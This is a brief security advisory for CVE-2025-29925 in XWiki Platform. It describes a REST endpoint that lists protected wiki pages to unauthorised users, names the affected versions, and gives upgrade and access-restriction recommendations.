CVE-2025-29925

Name of the Vulnerable Software and Affected Versions XWiki Platform versions prior to 15.10.14 XWiki Platform versions prior to 16.4.6 XWiki Platform versions prior to 16.10.0-rc-1

Description The issue affects the XWiki Platform, a generic wiki platform, where protected pages are listed when requesting the REST endpoints "/rest/wikis/[wikiName]/pages" even if the user doesn't have view rights on them. This is particularly true if the entire wiki is protected with "Prevent unregistered user to view pages". The endpoint would still list the pages of the wiki, though only for the main wiki.

Recommendations For versions prior to 15.10.14, update to XWiki Platform version 15.10.14 or later. For versions prior to 16.4.6, update to XWiki Platform version 16.4.6 or later. For versions prior to 16.10.0-rc-1, update to XWiki Platform version 16.10.0-rc-1 or later. As a temporary workaround, consider restricting access to the "/rest/wikis/[wikiName]/pages" endpoint until a patch is applied.